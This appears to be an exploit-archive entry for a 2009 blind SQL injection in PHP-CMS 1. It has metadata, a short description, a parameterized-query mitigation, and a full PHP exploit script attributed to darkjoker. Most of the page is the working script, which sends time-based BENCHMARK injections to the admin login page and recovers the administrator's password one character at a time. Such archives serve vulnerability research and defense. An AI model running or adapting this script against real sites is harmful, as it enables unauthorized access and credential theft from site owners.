PHP-CMS 1 Blind SQL Injection Exploit

vendor:

PHP-CMS 1

by:

darkjoker

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: PHP-CMS 1

Affected Version From: PHP-CMS 1

Affected Version To: PHP-CMS 1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP-CMS 1 Blind SQL Injection Exploit

This exploit is used to gain access to the admin panel of the PHP-CMS 1 application. It uses a blind SQL injection vulnerability to gain access to the admin panel. The exploit uses a function called query() to construct a malicious query and then uses the fsockopen() function to send the malicious query to the server. The exploit then uses the time() function to measure the response time of the server and if the response time is greater than 4 seconds, it means that the malicious query was successful and the exploit was successful.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries instead of dynamic queries. This will prevent the malicious query from being executed.

Source

Exploit-DB raw data:

--+++===================================================+++--
--+++====== PHP-CMS 1 Blind SQL Injection Exploit ======+++--
--+++===================================================+++--

<?php

function query ($user, $pos, $chr)
{
	$query = "x' OR IF((ASCII(SUBSTRING((SELECT password FROM ".
		 "admin WHERE username='{$user}'),{$pos},1))={$chr}),BENCHMARK".
		 "(100000000,CHAR(0)),0) OR '1' = '2";

	return $query;
}

function exploit ($hostname, $path, $user, $pos, $chr)
{
	$chr = ord ($chr);

	$fp = fsockopen ($hostname, 80);

	$post = "username=".query ($user, $pos, $chr) . "&password=x&Submit=ok";
	
	$req =  "POST {$path}/admin/login.php HTTP/1.1\r\n".
		"Host: {$hostname}\r\n".
		"Connection: Close\r\n".
		"Content-Type: application/x-www-form-urlencoded\r\n".
		"Content-Length: " . strlen ($post) . "\r\n\r\n".
		$post;
	
	fputs ($fp, $req);

	$start = time ();
	while (!feof ($fp))
		fgets ($fp, 1024);
	
	$end = time ();

	fclose ($fp);

	if ($end - $start > 4)
		return true;
	else
		return false;
	
}

function usage ()
{
	echo
		"\nPHP-CMS 1 Blind SQL Injection Exploit".
		"\n[+] Author  : darkjoker".
		"\n[+] Site    : http://darkjoker.net23.net".
		"\n[+] Download: http://heanet.dl.sourceforge.net/sourceforge/php-cms-project/phpcms.zip".
		"\n[+] Usage   : php xpl.php <hostname> <path> <username> [<keylist>]".
		"\n[+] Ex.     : php xpl.php localhost /PHPCMS admin abcdefghijklmnopqrstuvwxyz".
		"\n[+] Greetz  : my girlfriend, Vivi".
		"\n\n";
	exit ();
}



if ($argc < 3)
	usage ();

$hostname = $argv [1];
$path = $argv [2];
$user = $argv [3];
$key = (empty ($argv [4])) ? "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" : $argv [4];
$pos = 1;
$chr = 0;

echo "[+] Password: ";
while ($chr < strlen ($key))
{
	if (exploit ($hostname, $path, $user, $pos, $key [$chr]))
	{
		echo $key [$chr];
		$chr = 0;
		$pos++;
	}
	else
		$chr++;
}

echo "\n\n";

?>

# milw0rm.com [2009-01-26]